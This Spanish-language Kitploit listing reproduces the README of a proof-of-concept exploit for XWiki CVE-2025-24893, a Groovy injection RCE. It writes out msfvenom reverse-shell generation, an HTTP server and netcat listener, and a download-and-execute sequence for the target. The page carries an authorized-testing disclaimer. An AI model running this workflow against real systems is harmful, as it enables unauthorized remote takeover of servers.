Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24893 — PoC explota CVE-2025-24893 , una vulnerabilidad de ejecución remota de código (RCE) en XWiki causada por un sandboxing incorrecto en macros Groovy renderizadas de forma asíncrona. Permite la ejecución arbitraria de comandos mediante inyección en endpoints SolrSearch basados en RSS. | Kitploit
Herramientas/GitHubGitHub/infinit3i/cve-2025-24893
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebComando y Control
GitHubinfinit3i/cve-2025-24893

CVE-2025-24893

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

PoC explota CVE-2025-24893 , una vulnerabilidad de ejecución remota de código (RCE) en XWiki causada por un sandboxing incorrecto en macros Groovy renderizadas de forma asíncrona. Permite la ejecución arbitraria de comandos mediante inyección en endpoints SolrSearch basados en RSS.

Sitio web
61hace 11 mesesAún no revisado
Compartir

XWiki CVE-2025-24893 Prueba de Concepto

Autores: Net.Doge y Infinit3i


Imagen CVE-2025-24893



Seguir en Twitter


Este script de Python explota CVE-2025-24893, una vulnerabilidad de ejecución remota de código (RCE) en XWiki causada por un sandboxing inadecuado en macros de Groovy renderizadas de forma asíncrona. Permite la ejecución arbitraria de comandos mediante inyección en endpoints de SolrSearch basados en RSS.

📌 Características

  • Ejecución de un solo comando mediante inyección Groovy
  • Generación automática de payload de reverse shell (con msfvenom)
  • Opción para personalizar:
    • Objetivo remoto
    • Dirección IP local
    • Puerto del servidor HTTP
    • Puerto de beacon de reverse shell
  • Vistas previas limpias de payloads bash
  • TUI interactiva con códigos de color ANSI

🚀 Uso

  1. Clona o descarga el script.

  2. Asegúrate de tener instalado lo siguiente:

    • msfvenom de Metasploit
    • Python 3
    • jq (usado en los payloads bash)
  3. Ejecuta el script:

root@kitploit:~
python3 CVE-2025-24893-PoC.py
  1. Selecciona del menú:

    • Ejecutar Comando – Ejecuta cualquier comando de shell de forma remota.
    • Reverse Shell – Genera e implementa una reverse shell ELF en el objetivo.
    • Cambiar Configuración – Modifica LHOST, RHOST, puerto del servidor o puerto de beacon.

🧪 Flujo de trabajo de Reverse Shell

  1. Se genera el payload:
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
  1. Se te pedirá que inicies un servidor HTTP Python y un listener netcat:
root@kitploit:~
python3 -m http.server 8080
nc -lvnp 31337
  1. El script envía la siguiente secuencia al objetivo:

    • Descargar payload
    • Hacerlo ejecutable
    • Ejecutar el binario

⚠️ Aviso Legal

Esta herramienta es solo para fines educativos y de pruebas autorizadas. El uso no autorizado contra sistemas que no poseas o para los que no tengas permiso explícito para probar es ilegal y poco ético.

📄 Referencias

  • XWiki
  • MITRE CVE-2025-24893
Descargar herramienta